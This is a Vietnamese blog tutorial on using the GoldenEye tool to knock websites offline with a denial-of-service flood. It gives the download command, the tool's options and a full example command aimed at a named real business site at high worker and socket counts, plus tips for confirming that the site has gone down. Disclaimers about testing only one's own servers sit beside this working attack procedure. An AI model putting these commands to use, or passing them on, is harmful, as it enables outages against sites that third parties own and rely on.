GoldenEye là một Tool DoS đơn giản nhưng cực kỳ hiệu quả, thường được các quản trị Server dùng để kiểm tra sức chịu đựng của hệ thống khi bị DoS. Đặc điểm của GoldenEye là chỉ cần 1 IP, không dùng Proxy nhưng kết hợp với nhiều user againt tạo nên các luồng tấn công vào Server khá mạng.
Bạn có thể điều chỉnh số lượng kết nối DoS vào Server dựa trên tham số worker và socket. Từ đó có thể kiểm tra xem Web mình chịu tải được bao nhiêu.
Dos / DDos là gì?
Dos (viết tắt của Denial-of-service) là một dạng tấn công máy hoặc mạng, khiến cho chúng không còn khả năng sử dụng dựa theo nguyên lí của tắc nghẽn traffic hay vượt quá sức chịu đựng của 1 máy chủ hoặc mạng. Những đối tượng thường bị tấn công là những website , máy chủ server , mạng ,….
- GoldenEye tạo ra một lượng lớn truy cập cùng lúc vào Website khiến Server không chịu tải nổi dẫn đến Website sẽ ngưng hoạt động.
- Dấu hiệu để biết Website bị sập hay chưa là người dùng không thể truy cập được Web hoặc hiển thị không thể kết nối đến database.
Đối với Webmaster có thể Rathuuich.com/script-tu-dong-khoi-dong-nginx-mariadb-php-khi-web-loi-502-bad-gateway/” class=”local-link”>dùng cronjob để kiểm tra thường xuyên Website có bị sập không, nếu có thì tự khởi động lại các dịch vụ.
1 số lưu ý trước khi thực hiện
- Không DoS Rathuuich và các Website không phải của bạn quản lý
- Những kiểu Dos này rất tốn tài nguyên máy tính, vì vậy hãy sử dụng cho vừa đủ và đừng để overload máy tính. Bài viết chỉ mang tính chất nghiên cứu vậy nên hãy sử dụng tool này như 1 tool test website bạn hay website bạn có thể tấn công chứ đừng phá hoại website người khác.
Chuẩn bị
- Một máy tính chạy Linux (nếu chạy window có thể tải link ở đây)
- Python3 (xem hướng dẫn tải cho window và linux)
Hướng dẫn Dos website bằng GoldenEye
Chú ý! Chỉ thực hiện Test DDOS trên Website hoặc Server của bạn làm chủ. Mọi hành vi DDOS vào Website của người khác hoặc tổ chức khác đều vi phạm pháp luật.
Mở Terminal lên vào thực hiện các lệnh sau:
Tải GoldenEye về máy tính
git clone https://github.com/jseidl/GoldenEye
Vào thư mục GoldenEye
cd GoldenEye/
Cú pháp câu lệnh
python3 goldeneye.py <url> [tùy chọn]
Tùy chọn :
- – u : useragent (mặc định: tự tạo
- – w : worker (mặc định: 50)
- – s : socket (mặc định: 30)
- – m : method (post , get , random)
- – d : debug (mặc định : false)
- – n : nosslcheck (mặc định : true)
- – h : help
Ví dụ của bài :
python3 goldeneye.py https://duocphamviethung.com.vn/ -w 1000 -s 1000 -m post
(Đây là trang của người quen nhờ Check giùm)
Khi GoldenEye thông báo như này là nó đã chạy rồi nhé
Và kết quả đây:
Một số Server cấu hình mạnh sẽ chặn IP của bạn, tốt nhất để biết Web sập hay chưa bạn nên dùng 1 IP khác để truy cập thử hoặc kiểm tra tại check-host.net.
Và đó là cách sử dụng GoldenEye để Dos website. Hãy để lại bình luận ở dưới để mình biết ý kiến của mọi người nhé. Hãy xem thêm bài viết MHDDoS – Tool DDOS Attack với 36 kiểu tấn công hot tại đây.
